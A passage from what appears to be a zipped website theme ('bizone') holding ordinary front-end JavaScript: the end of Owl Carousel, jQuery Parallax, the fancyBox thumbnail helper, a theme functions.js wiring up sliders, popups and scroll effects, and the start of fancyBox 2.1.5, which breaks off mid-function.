a=0);return a},closestItem:function(){var a=this,b=!0===a.options.scrollPerPage?a.pagesInArray:a.positionsInArray,e=a.newPosX,c=null;f.each(b,function(d,g){e-a.itemWidth/20>b[d+1]&&e-a.itemWidth/20<g&&"left"===a.moveDirection()?(c=g,a.currentItem=!0===a.options.scrollPerPage?f.inArray(c,a.positionsInArray):d):e+a.itemWidth/20<g&&e+a.itemWidth/20>(b[d+1]||b[d]-a.itemWidth)&&"right"===a.moveDirection()&&(!0===a.options.scrollPerPage?(c=b[d+1]||b[b.length-1],a.currentItem=f.inArray(c,a.positionsInArray)):
(c=b[d+1],a.currentItem=d+1))});return a.currentItem},moveDirection:function(){var a;0>this.newRelativeX?(a="right",this.playDirection="next"):(a="left",this.playDirection="prev");return a},customEvents:function(){var a=this;a.$elem.on("owl.next",function(){a.next()});a.$elem.on("owl.prev",function(){a.prev()});a.$elem.on("owl.play",function(b,e){a.options.autoPlay=e;a.play();a.hoverStatus="play"});a.$elem.on("owl.stop",function(){a.stop();a.hoverStatus="stop"});a.$elem.on("owl.goTo",function(b,e){a.goTo(e)});
a.$elem.on("owl.jumpTo",function(b,e){a.jumpTo(e)})},stopOnHover:function(){var a=this;!0===a.options.stopOnHover&&!0!==a.browser.isTouch&&!1!==a.options.autoPlay&&(a.$elem.on("mouseover",function(){a.stop()}),a.$elem.on("mouseout",function(){"stop"!==a.hoverStatus&&a.play()}))},lazyLoad:function(){var a,b,e,c,d;if(!1===this.options.lazyLoad)return!1;for(a=0;a<this.itemsAmount;a+=1)b=f(this.$owlItems[a]),"loaded"!==b.data("owl-loaded")&&(e=b.data("owl-item"),c=b.find(".lazyOwl"),"string"!==typeof c.data("src")?
b.data("owl-loaded","loaded"):(void 0===b.data("owl-loaded")&&(c.hide(),b.addClass("loading").data("owl-loaded","checked")),(d=!0===this.options.lazyFollow?e>=this.currentItem:!0)&&e<this.currentItem+this.options.items&&c.length&&this.lazyPreload(b,c)))},lazyPreload:function(a,b){function e(){a.data("owl-loaded","loaded").removeClass("loading");b.removeAttr("data-src");"fade"===d.options.lazyEffect?b.fadeIn(400):b.show();"function"===typeof d.options.afterLazyLoad&&d.options.afterLazyLoad.apply(this,
[d.$elem])}function c(){f+=1;d.completeImg(b.get(0))||!0===k?e():100>=f?g.setTimeout(c,100):e()}var d=this,f=0,k;"DIV"===b.prop("tagName")?(b.css("background-image","url("+b.data("src")+")"),k=!0):b[0].src=b.data("src");c()},autoHeight:function(){function a(){var a=f(e.$owlItems[e.currentItem]).height();e.wrapperOuter.css("height",a+"px");e.wrapperOuter.hasClass("autoHeight")||g.setTimeout(function(){e.wrapperOuter.addClass("autoHeight")},0)}function b(){d+=1;e.completeImg(c.get(0))?a():100>=d?g.setTimeout(b,
100):e.wrapperOuter.css("height","")}var e=this,c=f(e.$owlItems[e.currentItem]).find("img"),d;void 0!==c.get(0)?(d=0,b()):a()},completeImg:function(a){return!a.complete||"undefined"!==typeof a.naturalWidth&&0===a.naturalWidth?!1:!0},onVisibleItems:function(){var a;!0===this.options.addClassActive&&this.$owlItems.removeClass("active");this.visibleItems=[];for(a=this.currentItem;a<this.currentItem+this.options.items;a+=1)this.visibleItems.push(a),!0===this.options.addClassActive&&f(this.$owlItems[a]).addClass("active");
this.owl.visibleItems=this.visibleItems},transitionTypes:function(a){this.outClass="owl-"+a+"-out";this.inClass="owl-"+a+"-in"},singleItemTransition:function(){var a=this,b=a.outClass,e=a.inClass,c=a.$owlItems.eq(a.currentItem),d=a.$owlItems.eq(a.prevItem),f=Math.abs(a.positionsInArray[a.currentItem])+a.positionsInArray[a.prevItem],g=Math.abs(a.positionsInArray[a.currentItem])+a.itemWidth/2;a.isTransition=!0;a.$owlWrapper.addClass("owl-origin").css({"-webkit-transform-origin":g+"px","-moz-perspective-origin":g+
"px","perspective-origin":g+"px"});d.css({position:"relative",left:f+"px"}).addClass(b).on("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend",function(){a.endPrev=!0;d.off("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend");a.clearTransStyle(d,b)});c.addClass(e).on("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend",function(){a.endCurrent=!0;c.off("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend");a.clearTransStyle(c,e)})},clearTransStyle:function(a,
b){a.css({position:"",left:""}).removeClass(b);this.endPrev&&this.endCurrent&&(this.$owlWrapper.removeClass("owl-origin"),this.isTransition=this.endCurrent=this.endPrev=!1)},owlStatus:function(){this.owl={userOptions:this.userOptions,baseElement:this.$elem,userItems:this.$userItems,owlItems:this.$owlItems,currentItem:this.currentItem,prevItem:this.prevItem,visibleItems:this.visibleItems,isTouch:this.browser.isTouch,browser:this.browser,dragDirection:this.dragDirection}},clearEvents:function(){this.$elem.off(".owl owl mousedown.disableTextSelect");
f(k).off(".owl owl");f(g).off("resize",this.resizer)},unWrap:function(){0!==this.$elem.children().length&&(this.$owlWrapper.unwrap(),this.$userItems.unwrap().unwrap(),this.owlControls&&this.owlControls.remove());this.clearEvents();this.$elem.attr("style",this.$elem.data("owl-originalStyles")||"").attr("class",this.$elem.data("owl-originalClasses"))},destroy:function(){this.stop();g.clearInterval(this.checkVisible);this.unWrap();this.$elem.removeData()},reinit:function(a){a=f.extend({},this.userOptions,
a);this.unWrap();this.init(a,this.$elem)},addItem:function(a,b){var e;if(!a)return!1;if(0===this.$elem.children().length)return this.$elem.append(a),this.setVars(),!1;this.unWrap();e=void 0===b||-1===b?-1:b;e>=this.$userItems.length||-1===e?this.$userItems.eq(-1).after(a):this.$userItems.eq(e).before(a);this.setVars()},removeItem:function(a){if(0===this.$elem.children().length)return!1;a=void 0===a||-1===a?-1:a;this.unWrap();this.$userItems.eq(a).remove();this.setVars()}};f.fn.owlCarousel=function(a){return this.each(function(){if(!0===
f(this).data("owl-init"))return!1;f(this).data("owl-init",!0);var b=Object.create(l);b.init(a,this);f.data(this,"owlCarousel",b)})};f.fn.owlCarousel.options={items:5,itemsCustom:!1,itemsDesktop:[1199,4],itemsDesktopSmall:[979,3],itemsTablet:[768,2],itemsTabletSmall:!1,itemsMobile:[479,1],singleItem:!1,itemsScaleUp:!1,slideSpeed:200,paginationSpeed:800,rewindSpeed:1E3,autoPlay:!1,stopOnHover:!1,navigation:!1,navigationText:["prev","next"],rewindNav:!0,scrollPerPage:!1,pagination:!0,paginationNumbers:!1,
responsive:!0,responsiveRefreshRate:200,responsiveBaseWidth:g,baseClass:"owl-carousel",theme:"owl-theme",lazyLoad:!1,lazyFollow:!0,lazyEffect:"fade",autoHeight:!1,jsonPath:!1,jsonSuccess:!1,dragBeforeAnimFinish:!0,mouseDrag:!0,touchDrag:!0,addClassActive:!1,transitionStyle:!1,beforeUpdate:!1,afterUpdate:!1,beforeInit:!1,afterInit:!1,beforeMove:!1,afterMove:!1,afterAction:!1,startDragging:!1,afterLazyLoad:!1}})(jQuery,window,document);PK!�Ec�//"bizone/js/jquery.parallax-1.1.3.jsnu&1i�/*
Plugin: jQuery Parallax
Version 1.1.3
Author: Ian Lunn
Twitter: @IanLunn
Author URL: http://www.ianlunn.co.uk/
Plugin URL: http://www.ianlunn.co.uk/plugins/jquery-parallax/

Dual licensed under the MIT and GPL licenses:
http://www.opensource.org/licenses/mit-license.php
http://www.gnu.org/licenses/gpl.html
*/

(function( $ ){
	var $window = $(window);
	var windowHeight = $window.height();

	$window.resize(function () {
		windowHeight = $window.height();
	});

	$.fn.parallax = function(xpos, speedFactor, outerHeight) {
		var $this = $(this);
		var getHeight;
		var firstTop;
		var paddingTop = 0;
		
		//get the starting position of each element to have parallax applied to it		
		$this.each(function(){
		    firstTop = $this.offset().top;
		});

		if (outerHeight) {
			getHeight = function(jqo) {
				return jqo.outerHeight(true);
			};
		} else {
			getHeight = function(jqo) {
				return jqo.height();
			};
		}
			
		// setup defaults if arguments aren't specified
		if (arguments.length < 1 || xpos === null) xpos = "50%";
		if (arguments.length < 2 || speedFactor === null) speedFactor = 0.1;
		if (arguments.length < 3 || outerHeight === null) outerHeight = true;
		
		// function to be called whenever the window is scrolled or resized
		function update(){
			var pos = $window.scrollTop();				

			$this.each(function(){
				var $element = $(this);
				var top = $element.offset().top;
				var height = getHeight($element);

				// Check if totally above or totally below viewport
				if (top + height < pos || top > pos + windowHeight) {
					return;
				}

				$this.css('backgroundPosition', xpos + " " + Math.round((firstTop - pos) * speedFactor) + "px");
			});
		}		

		$window.bind('scroll', update).resize(update);
		update();
	};
})(jQuery);
PK!޹�ߝ�#bizone/js/jquery.fancybox-thumbs.jsnu&1i� /*!
 * Thumbnail helper for fancyBox
 * version: 1.0.7 (Mon, 01 Oct 2012)
 * @requires fancyBox v2.0 or later
 *
 * Usage:
 *     $(".fancybox").fancybox({
 *         helpers : {
 *             thumbs: {
 *                 width  : 50,
 *                 height : 50
 *             }
 *         }
 *     });
 *
 */
(function ($) {
	//Shortcut for fancyBox object
	var F = $.fancybox;

	//Add helper object
	F.helpers.thumbs = {
		defaults : {
			width    : 50,       // thumbnail width
			height   : 50,       // thumbnail height
			position : 'bottom', // 'top' or 'bottom'
			source   : function ( item ) {  // function to obtain the URL of the thumbnail image
				var href;

				if (item.element) {
					href = $(item.element).find('img').attr('src');
				}

				if (!href && item.type === 'image' && item.href) {
					href = item.href;
				}

				return href;
			}
		},

		wrap  : null,
		list  : null,
		width : 0,

		init: function (opts, obj) {
			var that = this,
				list,
				thumbWidth  = opts.width,
				thumbHeight = opts.height,
				thumbSource = opts.source;

			//Build list structure
			list = '';

			for (var n = 0; n < obj.group.length; n++) {
				list += '<li><a style="width:' + thumbWidth + 'px;height:' + thumbHeight + 'px;" href="javascript:jQuery.fancybox.jumpto(' + n + ');"></a></li>';
			}

			this.wrap = $('<div id="fancybox-thumbs"></div>').addClass(opts.position).appendTo('body');
			this.list = $('<ul>' + list + '</ul>').appendTo(this.wrap);

			//Load each thumbnail
			$.each(obj.group, function (i) {
				var href = thumbSource( obj.group[ i ] );

				if (!href) {
					return;
				}

				$("<img />").load(function () {
					var width  = this.width,
						height = this.height,
						widthRatio, heightRatio, parent;

					if (!that.list || !width || !height) {
						return;
					}

					//Calculate thumbnail width/height and center it
					widthRatio  = width / thumbWidth;
					heightRatio = height / thumbHeight;

					parent = that.list.children().eq(i).find('a');

					if (widthRatio >= 1 && heightRatio >= 1) {
						if (widthRatio > heightRatio) {
							width  = Math.floor(width / heightRatio);
							height = thumbHeight;

						} else {
							width  = thumbWidth;
							height = Math.floor(height / widthRatio);
						}
					}

					$(this).css({
						width  : width,
						height : height,
						top    : Math.floor(thumbHeight / 2 - height / 2),
						left   : Math.floor(thumbWidth / 2 - width / 2)
					});

					parent.width(thumbWidth).height(thumbHeight);

					$(this).hide().appendTo(parent).fadeIn(300);

				}).attr('src', href);
			});

			//Set initial width
			this.width = this.list.children().eq(0).outerWidth(true);

			this.list.width(this.width * (obj.group.length + 1)).css('left', Math.floor($(window).width() * 0.5 - (obj.index * this.width + this.width * 0.5)));
		},

		beforeLoad: function (opts, obj) {
			//Remove self if gallery do not have at least two items
			if (obj.group.length < 2) {
				obj.helpers.thumbs = false;

				return;
			}

			//Increase bottom margin to give space for thumbs
			obj.margin[ opts.position === 'top' ? 0 : 2 ] += ((opts.height) + 15);
		},

		afterShow: function (opts, obj) {
			//Check if exists and create or update list
			if (this.list) {
				this.onUpdate(opts, obj);

			} else {
				this.init(opts, obj);
			}

			//Set active element
			this.list.children().removeClass('active').eq(obj.index).addClass('active');
		},

		//Center list
		onUpdate: function (opts, obj) {
			if (this.list) {
				this.list.stop(true).animate({
					'left': Math.floor($(window).width() * 0.5 - (obj.index * this.width + this.width * 0.5))
				}, 150);
			}
		},

		beforeClose: function () {
			if (this.wrap) {
				this.wrap.remove();
			}

			this.wrap  = null;
			this.list  = null;
			this.width = 0;
		}
	}

}(jQuery));PK!����bizone/js/functions.jsnu&1i�
jQuery(function($) {'use strict',		  
	  //Window Loaded Handler
  	$(window).load(function(){'use strict';
		$(".loader").fadeOut("slow");
  	});   	
	 
  	// ========================================================================= 
	//	Back to Top
	// ========================================================================= 
	 
	if ($('.go-top').length) {
	    var scrollTrigger = 100, // px
	        backToTop = function () {
	            var scrollTop = $(window).scrollTop();
	            if (scrollTop > scrollTrigger) {
	                $('.go-top').addClass('show');
	            } else {
	                $('.go-top').removeClass('show');
	            }
	        };
	    backToTop();
	    $(window).on('scroll', function () {
	        backToTop();
	    });
	    $('.go-top').on('click', function (e) {
	        e.preventDefault();
	        $('html,body').animate({
	            scrollTop: 0
	        }, 700);
	    });
	} 

	//Change Diffrent Logos on Nav
  	jQuery(window).scroll(function() {  
		if (jQuery(window).scrollTop() >= 25) {
			jQuery("a.bizone-logo img").attr("src", jQuery("a.bizone-logo img").attr("data-sticky"));
		} else {
			jQuery("a.bizone-logo img").attr("src", jQuery("a.bizone-logo img").attr("data-default"));
		}  
  	});
   

// Scroll One Page Menu
  	$('a.page-scroll, .cbp-spmenu a').on('click', function(event){
  		console.log("click");
		var $anchor = $(this);
        $('html, body').stop().animate({
            scrollTop: $($anchor.attr('href')).offset().top
        }, 1200, 'easeInOutExpo');
       	event.preventDefault();
       	if(!$("#main-navigation").hasClass("index5")){
			$('#navigation').affix({offset: {top: 50} });
       	}
   });

  	// Submenu
  	var menu_timeout;
    $('ul.navbar-nav li.parent.dropdown').hover(
    	function(){
        var me=$(this);
             menu_timeout=window.setTimeout(function(){
                 me.children('ul').slideDown();
             },300);
         },
        function(){
            var me=$(this);
            window.clearTimeout(menu_timeout);
            me.children('ul').slideUp();    
        }
    );


	//Facts Counters Home Page
	 $(".number-counters").appear(function () {
		$(".number-counters [data-to]").each(function () {
		  var e = $(this).attr("data-to");
		  $(this).delay(6e3).countTo({
			 from: 50,
			 to: e,
			 speed: 3e3,
			 refreshInterval: 50
		  })
		})
	 });
		  
	 
	
 	//FOr Circular Progress show
	 $('.some').appear(function () {
		 $('.myStat2').circliful() 
	 });   
	 

  
	//For Testinomial 
	$("#testinomial-slider").owlCarousel({
		  autoPlay : true,
		  navigation : true,
		  slideSpeed : 250,
		  pagination : false,
		  navigationText :["<i class='fa fa-angle-left'></i>","<i class='fa fa-angle-right'></i>"],
		  singleItem:true
	
	 });

  
	//For Publication Section(Home Page)
    $("#publication-slider").owlCarousel({
		  autoPlay: true, 
		  pagination : false,
		  navigationText :["<i class='fa fa-angle-left'></i>","<i class='fa fa-angle-right'></i>"],
		  navigation : true,
		  items : 3,
		  itemsDesktop : [1199,3],
		  itemsDesktopSmall : [979,3]
 
  	});
  	//Paralax Page Slider
	var owl = $("#paralax-slider");
		owl.owlCarousel({
		autoPlay: 3000,
		navigation : false,
		singleItem : true,
		transitionStyle : "fade"
	});
    
  
	  // portfolio filtering
    $(".project-wrapper").mixItUp();
	 
	 
 	// Popup
   $(".fancybox").fancybox({
		openEffect : 'fade',
		closeClick : true,
		helpers : {
			media : {}
		}

    });
	 //Video Popup
	 $('.fancybox-media').fancybox({
		openEffect  : 'fade',
		closeEffect : 'none',
		helpers : {
			media : {}
		}
	});
	
	
	//Push Menu on click
	$('.toggle-menu').jPushMenu();
	  $(document).on('click', function () {
        $('.cbp-spmenu-right').removeClass('menu-open');
    });
    $('#menu-toggle').on('click', function (e) {
        e.stopPropagation();
        $('.cbp-spmenu-right').toggleClass('menu-open');
    });
    $('.cbp-spmenu-right').on('click', function (e) {
        e.stopPropagation();
    });

	//Parallax effects
	$('#bg-paralax ').parallax("50%", 0.3);
	$('#testinomial').parallax("50%", 0.2);
	$('.text-rotator').parallax("50%", 0.2);	 
	
	//Initiat WOW JS
	new WOW().init();

	if($("ul.blue-social").length ){
        $("ul.blue-social a").jqSocialSharer();
    }  
});
if(screen.width <720 ){ 
	$('div, img, input, textarea, button, a').removeClass('wow'); // to remove transition
}PK!6~�%�%�bizone/js/jquery.fancybox.jsnu&1i�/*!
 * fancyBox - jQuery Plugin
 * version: 2.1.5 (Fri, 14 Jun 2013)
 * @requires jQuery v1.6 or later
 *
 * Examples at http://fancyapps.com/fancybox/
 * License: www.fancyapps.com/fancybox/#license
 *
 * Copyright 2012 Janis Skarnelis - janis@fancyapps.com
 *
 */

(function (window, document, $, undefined) {
	"use strict";

	var H = $("html"),
		W = $(window),
		D = $(document),
		F = $.fancybox = function () {
			F.open.apply( this, arguments );
		},
		IE =  navigator.userAgent.match(/msie/i),
		didUpdate	= null,
		isTouch		= document.createTouch !== undefined,

		isQuery	= function(obj) {
			return obj && obj.hasOwnProperty && obj instanceof $;
		},
		isString = function(str) {
			return str && $.type(str) === "string";
		},
		isPercentage = function(str) {
			return isString(str) && str.indexOf('%') > 0;
		},
		isScrollable = function(el) {
			return (el && !(el.style.overflow && el.style.overflow === 'hidden') && ((el.clientWidth && el.scrollWidth > el.clientWidth) || (el.clientHeight && el.scrollHeight > el.clientHeight)));
		},
		getScalar = function(orig, dim) {
			var value = parseInt(orig, 10) || 0;

			if (dim && isPercentage(orig)) {
				value = F.getViewport()[ dim ] / 100 * value;
			}

			return Math.ceil(value);
		},
		getValue = function(value, dim) {
			return getScalar(value, dim) + 'px';
		};

	$.extend(F, {
		// The current version of fancyBox
		version: '2.1.5',

		defaults: {
			padding : 15,
			margin  : 20,

			width     : 800,
			height    : 600,
			minWidth  : 100,
			minHeight : 100,
			maxWidth  : 9999,
			maxHeight : 9999,
			pixelRatio: 1, // Set to 2 for retina display support

			autoSize   : true,
			autoHeight : false,
			autoWidth  : false,

			autoResize  : true,
			autoCenter  : !isTouch,
			fitToView   : true,
			aspectRatio : false,
			topRatio    : 0.5,
			leftRatio   : 0.5,

			scrolling : 'auto', // 'auto', 'yes' or 'no'
			wrapCSS   : '',

			arrows     : true,
			closeBtn   : true,
			closeClick : false,
			nextClick  : false,
			mouseWheel : true,
			autoPlay   : false,
			playSpeed  : 3000,
			preload    : 3,
			modal      : false,
			loop       : true,

			ajax  : {
				dataType : 'html',
				headers  : { 'X-fancyBox': true }
			},
			iframe : {
				scrolling : 'auto',
				preload   : true
			},
			swf : {
				wmode: 'transparent',
				allowfullscreen   : 'true',
				allowscriptaccess : 'always'
			},

			keys  : {
				next : {
					13 : 'left', // enter
					34 : 'up',   // page down
					39 : 'left', // right arrow
					40 : 'up'    // down arrow
				},
				prev : {
					8  : 'right',  // backspace
					33 : 'down',   // page up
					37 : 'right',  // left arrow
					38 : 'down'    // up arrow
				},
				close  : [27], // escape key
				play   : [32], // space - start/stop slideshow
				toggle : [70]  // letter "f" - toggle fullscreen
			},

			direction : {
				next : 'left',
				prev : 'right'
			},

			scrollOutside  : true,

			// Override some properties
			index   : 0,
			type    : null,
			href    : null,
			content : null,
			title   : null,

			// HTML templates
			tpl: {
				wrap     : '<div class="fancybox-wrap" tabIndex="-1"><div class="fancybox-skin"><div class="fancybox-outer"><div class="fancybox-inner"></div></div></div></div>',
				image    : '<img class="fancybox-image" src="{href}" alt="" />',
				iframe   : '<iframe id="fancybox-frame{rnd}" name="fancybox-frame{rnd}" class="fancybox-iframe" frameborder="0" vspace="0" hspace="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen' + (IE ? ' allowtransparency="true"' : '') + '></iframe>',
				error    : '<p class="fancybox-error">The requested content cannot be loaded.<br/>Please try again later.</p>',
				closeBtn : '<a title="Close" class="fancybox-item fancybox-close" href="javascript:;"></a>',
				next     : '<a title="Next" class="fancybox-nav fancybox-next" href="javascript:;"><span></span></a>',
				prev     : '<a title="Previous" class="fancybox-nav fancybox-prev" href="javascript:;"><span></span></a>'
			},

			// Properties for each animation type
			// Opening fancyBox
			openEffect  : 'fade', // 'elastic', 'fade' or 'none'
			openSpeed   : 250,
			openEasing  : 'swing',
			openOpacity : true,
			openMethod  : 'zoomIn',

			// Closing fancyBox
			closeEffect  : 'fade', // 'elastic', 'fade' or 'none'
			closeSpeed   : 250,
			closeEasing  : 'swing',
			closeOpacity : true,
			closeMethod  : 'zoomOut',

			// Changing next gallery item
			nextEffect : 'elastic', // 'elastic', 'fade' or 'none'
			nextSpeed  : 250,
			nextEasing : 'swing',
			nextMethod : 'changeIn',

			// Changing previous gallery item
			prevEffect : 'elastic', // 'elastic', 'fade' or 'none'
			prevSpeed  : 250,
			prevEasing : 'swing',
			prevMethod : 'changeOut',

			// Enable default helpers
			helpers : {
				overlay : true,
				title   : true
			},

			// Callbacks
			onCancel     : $.noop, // If canceling
			beforeLoad   : $.noop, // Before loading
			afterLoad    : $.noop, // After loading
			beforeShow   : $.noop, // Before changing in current item
			afterShow    : $.noop, // After opening
			beforeChange : $.noop, // Before changing gallery item
			beforeClose  : $.noop, // Before closing
			afterClose   : $.noop  // After closing
		},

		//Current state
		group    : {}, // Selected group
		opts     : {}, // Group options
		previous : null,  // Previous element
		coming   : null,  // Element being loaded
		current  : null,  // Currently loaded element
		isActive : false, // Is activated
		isOpen   : false, // Is currently open
		isOpened : false, // Have been fully opened at least once

		wrap  : null,
		skin  : null,
		outer : null,
		inner : null,

		player : {
			timer    : null,
			isActive : false
		},

		// Loaders
		ajaxLoad   : null,
		imgPreload : null,

		// Some collections
		transitions : {},
		helpers     : {},

		/*
		 *	Static methods
		 */

		open: function (group, opts) {
			if (!group) {
				return;
			}

			if (!$.isPlainObject(opts)) {
				opts = {};
			}

			// Close if already active
			if (false === F.close(true)) {
				return;
			}

			// Normalize group
			if (!$.isArray(group)) {
				group = isQuery(group) ? $(group).get() : [group];
			}

			// Recheck if the type of each element is `object` and set content type (image, ajax, etc)
			$.each(group, function(i, element) {
				var obj = {},
					href,
					title,
					content,
					type,
					rez,
					hrefParts,
					selector;

				if ($.type(element) === "object") {
					// Check if is DOM element
					if (element.nodeType) {
						element = $(element);
					}

					if (isQuery(element)) {
						obj = {
							href    : element.data('fancybox-href') || element.attr('href'),
							title   : element.data('fancybox-title') || element.attr('title'),
							isDom   : true,
							element : element
						};

						if ($.metadata) {
							$.extend(true, obj, element.metadata());
						}

					} else {
						obj = element;
					}
				}

				href  = opts.href  || obj.href || (isString(element) ? element : null);
				title = opts.title !== undefined ? opts.title : obj.title || '';

				content = opts.content || obj.content;
				type    = content ? 'html' : (opts.type  || obj.type);

				if (!type && obj.isDom) {
					type = element.data('fancybox-type');

					if (!type) {
						rez  = element.prop('class').match(/fancybox\.(\w+)/);
						type = rez ? rez[1] : null;
					}
				}

				if (isString(href)) {
					// Try to guess the content type
					if (!type) {
						if (F.isImage(href)) {
							type = 'image';

						} else if (F.isSWF(href)) {
							type = 'swf';

						} else if (href.charAt(0) === '#') {
							type = 'inline';

						} else if (isString(element)) {
							type    = 'html';
							content = element;
						}
					}

					// Split url into two pieces with source url and content selector, e.g,
					// "/mypage.html #my_id" will load "/mypage.html" and display element having id "my_id"
					if (type === 'ajax') {
						hrefParts = href.split(/\s+/, 2);
						href      = hrefParts.shift();
						selector  = hrefParts.shift();
					}
				}

				if (!content) {
					if (type === 'inline') {
						if (href) {
							content = $( isString(href) ? href.replace(/.*(?=#[^\s]+$)/, '') : href ); //strip for ie7

						} else if (obj.isDom) {
							content = element;
						}

					} else if (type === 'html') {
						content = href;

					} else if (!type && !href && obj.isDom) {
						type    = 'inline';
						content = element;
					}
				}

				$.extend(obj, {
					href     : href,
					type     : type,
					content  : content,
					title    : title,
					selector : selector
				});

				group[ i ] = obj;
			});

			// Extend the defaults
			F.opts = $.extend(true, {}, F.defaults, opts);

			// All options are merged recursive except keys
			if (opts.keys !== undefined) {
				F.opts.keys = opts.keys ? $.extend({}, F.defaults.keys, opts.keys) : false;
			}

			F.group = group;

			return F._start(F.opts.index);
		},

		// Cancel image loading or abort ajax request
		cancel: function () {
			var coming = F.coming;

			if (!coming || false === F.trigger('onCancel')) {
				return;
			}

			F.hideLoading();

			if (F.ajaxLoad) {
				F.ajaxLoad.abort();
			}

			F.ajaxLoad = null;

			if (F.imgPreload) {
				F.imgPreload.onload = F.imgPreload.onerror = null;
			}

			if (coming.wrap) {
				coming.wrap.stop(true, true).trigger('onReset').remove();
			}

			F.coming = null;

			// If the first item has been canceled, then clear everything
			if (!F.current) {
				F._afterZoomOut( coming );
			}
		},

		// Start closing animation if is open; remove immediately if opening/closing
		close: function (event) {
			F.cancel();

			if (false === F.trigger('beforeClose')) {
				return;
			}

			F.unbindEvents();

			if (!F.isActive) {
				return;
			}

			if (!F.isOpen || event === true) {
				$('.fancybox-wrap').stop(true).trigger('onReset').remove();

				F._afterZoomOut();

			} else {
				F.isOpen = F.isOpened = false;
				F.isClosing = true;

				$('.fancybox-item, .fancybox-nav').remove();

				F.wrap.stop(true, true).removeClass('fancybox-opened');

				F.transitions[ F.current.closeMethod ]();
			}
		},

		// Manage slideshow:
		//   $.fancybox.play(); - toggle slideshow
		//   $.fancybox.play( true ); - start
		//   $.fancybox.play( false ); - stop
		play: function ( action ) {
			var clear = function () {
					clearTimeout(F.player.timer);
				},
				set = function () {
					clear();

					if (F.current && F.player.isActive) {
						F.player.timer = setTimeout(F.next, F.current.playSpeed);
					}
				},
				stop = function () {
					clear();

					D.unbind('.player');

					F.player.isActive = false;

					F.trigger('onPlayEnd');
				},
				start = function () {
					if (F.current && (F.current.loop || F.current.index < F.group.length - 1)) {
						F.player.isActive = true;

						D.bind({
							'onCancel.player beforeClose.player' : stop,
							'onUpdate.player'   : set,
							'beforeLoad.player' : clear
						});

						set();

						F.trigger('onPlayStart');
					}
				};

			if (action === true || (!F.player.isActive && action !== false)) {
				start();
			} else {
				stop();
			}
		},

		// Navigate to next gallery item
		next: function ( direction ) {
			var current = F.current;

			if (current) {
				if (!isString(direction)) {
					direction = current.direction.next;
				}

				F.jumpto(current.index + 1, direction, 'next');
			}
		},

		// Navigate to previous gallery item
		prev: function ( direction ) {
			var current = F.current;

			if (current) {
				if (!isString(direction)) {
					direction = current.direction.prev;
				}

				F.jumpto(current.index - 1, direction, 'prev');
			}
		},

		// Navigate to gallery item by index
		jumpto: function ( index, direction, router ) {
			var current = F.current;

			if (!current) {
				return;
			}

			index = getScalar(index);

			F.direction = direction || current.direction[ (index >= current.index ? 'next' : 'prev') ];
			F.router    = router || 'jumpto';

			if (current.loop) {
				if (index < 0) {
					index = current.group.length + (index % current.group.length);
				}

				index = index % current.group.length;
			}

			if (current.group[ index ] !== undefined) {
				F.cancel();

				F._start(index);
			}
		},

		// Center inside viewport and toggle position type to fixed or absolute if needed
		reposition: function (e, onlyAbsolute) {
			var current = F.current,
				wrap    = current ? current.wrap : null,
				pos;

			if (wrap) {
				pos = F._getPosition(onlyAbsolute);

				if (e && e.type === 'scroll') {
					delete pos.position;

					wrap.stop(true, true).animate(pos, 200);

				} else {
					wrap.css(pos);

					current.pos = $.extend({}, current.dim, pos);
				}
			}
		},

		update: function (e) {
			var type = (e && e.type),
				anyway = !type || type === 'orientationchange';

			if (anyway) {
				clearTimeout(didUpdate);

				didUpdate = null;
			}

			if (!F.isOpen || didUpdate) {
				return;
			}

			didUpdate = setTimeout(function() {
				var current = F.current;

				if (!current || F.isClosing) {
					return;
				}

				F.wrap.removeClass('fancybox-tmp');

				if (anyway || type === 'load' || (type === 'resize' && current.autoResize)) {
					F._setDimension();
				}

				if (!(type === 'scroll' && current.canShrink)) {
					F.reposition(e);
				}

				F.trigger('onUpdate');

				didUpdate = null;

			}, (anyway && !isTouch ? 0 : 300));
		},

		// Shrink content to fit inside viewport or restore if resized
		toggle: function ( action ) {
			if (F.isOpen) {
				F.current.fitToView = $.type(action) === "boolean" ? action : !F.current.fitToView;

				// Help browser to restore document dimensions
				if (isTouch) {
					F.wrap.removeAttr('style').addClass('fancybox-tmp');

					F.trigger('onUpdate');
				}

				F.update();
			}
		},

		hideLoading: function () {
			D.unbind('.loading');

			$('#fancybox-loading').remove();
		},

		showLoading: function () {
			var el, viewport;

			F.hideLoading();

			el = $('<div id="fancybox-loading"><div></div></div>').click(F.cancel).appendTo('body');

			// If user will press the escape-button, the request will be canceled
			D.bind('keydown.loading', function(e) {
				if ((e.which || e.keyCode) === 27) {
					e.preventDefault();

					F.cancel();
				}
			});

			if (!F.defaults.fixed) {
				viewport = F.getViewport();

				el.css({
					position : 'absolute',
					top  : (viewport.h * 0.5) + viewport.y,
					left : (viewport.w * 0.5) + viewport.x
				});
			}
		},

		getViewport: function () {
			var locked = (F.current && F.current.locked) || false,
				rez    = {
					x: W.scrollLeft(),
					y: W.scrollTop()
				};

			if (locked) {
				rez.w = locked[0].clientWidth;
				rez.h = locked[0].clientHeight;

			} else {
				// See http://bugs.jquery.com/ticket/6724
				rez.w = isTouch && window.innerWidth  ? window.innerWidth  : W.width();
				rez.h = isTouch && window.innerHeight ? window.innerHeight : W.height();
			}

			return rez;
		},

		// Unbind the keyboard / clicking actions
		unbindEvents: function () {
			if (F.wrap && isQuery(F.wrap)) {
				F.wrap.unbind('.fb');
			}

			D.unbind('.fb');
			W.unbind('.fb');
		},

		bindEvents: function () {
			var current = F.current,
				keys;

			if (!current) {
				return;
			}

			// Changing document height on iOS devices triggers a 'resize' event,
			// that can change document height... repeating infinitely
			W.bind('orientationchange.fb' + (isTouch ? '' : ' resize.fb') + (current.autoCenter && !current.locked ? ' scroll.fb' : ''), F.update);

			keys = current.keys;

			if (keys) {
				D.bind('keydown.fb', function (e) {
					var code   = e.which || e.keyCode,
						target = e.target || e.srcElement;

					// Skip esc key if loading, because showLoading will cancel preloading
					if (code === 27 && F.coming) {
						return false;
					}

					// Ignore key combinations and key events within form elements
					if (!e.ctrlKey && !e.altKey && !e.shiftKey && !e.metaKey && !(target && (target.type || $(target).is('[contenteditable]')))) {
						$.each(keys, function(i, val) {
							if (current.group.length > 1 && val[ code ] !== undefined) {
								F[ i ]( val[ code ] );

								e.preventDefault();
								return false;
							}

							if ($.inArray(code, val) > -1) {
								F[ i ] ();

								e.preventDefault();
